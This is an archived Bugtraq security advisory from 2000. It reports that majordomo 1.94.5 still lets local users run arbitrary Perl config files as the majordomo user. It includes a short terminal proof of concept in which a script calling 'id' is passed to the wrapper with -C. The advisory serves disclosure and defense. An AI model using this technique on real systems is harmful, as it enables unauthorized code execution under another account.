Computer Security

Archive : 1999 : december : majordomo3
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku





majordomo 1.94.5 does not fix all vulnerabilities




majordomo 1.94.5 does not fix all vulnerabilities






=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Пн, 24 янв 2000  23:55:42

   От: Brock Sides <bsides@TOWERY.COM>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: majordomo 1.94.5 does not fix all vulnerabilities

--------------------------------------------------------------------------------




Whereas majordomo 1.94.5 does fix the bug in resend, discovered by Brock

Tellier, that permits execution of arbitrary code as user majordomo, it

apparently does not fix the other bug in the script majordomo, that

permits execution of arbitrary config files as user majordomo:



On a fresh install of majordomo 1.94.5 in /tmp:



[brock@o2 /tmp]$ id

uid=1116(brock) gid=1116(brock)

[brock@o2 /tmp]$ ls -l ./id.pl

-rwxr-xr-x    1 brock    brock         31 Jan 24 14:17 ./id.pl

[brock@o2 /tmp]$ cat id.pl

#!/usr/bin/perl



system("id");

[brock@o2 /tmp]$ ./majordomo-1.94.5/wrapper majordomo -C ./id.pl

uid=1126(majordomo) gid=1(daemon)

./id.pl did not return a true value at /tmp/majordomo-1.94.5/majordomo

line 47.

[brock@o2 /tmp]$



--

Brock Sides

Unix Systems Administration

Towery Publishing

bsides@towery.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru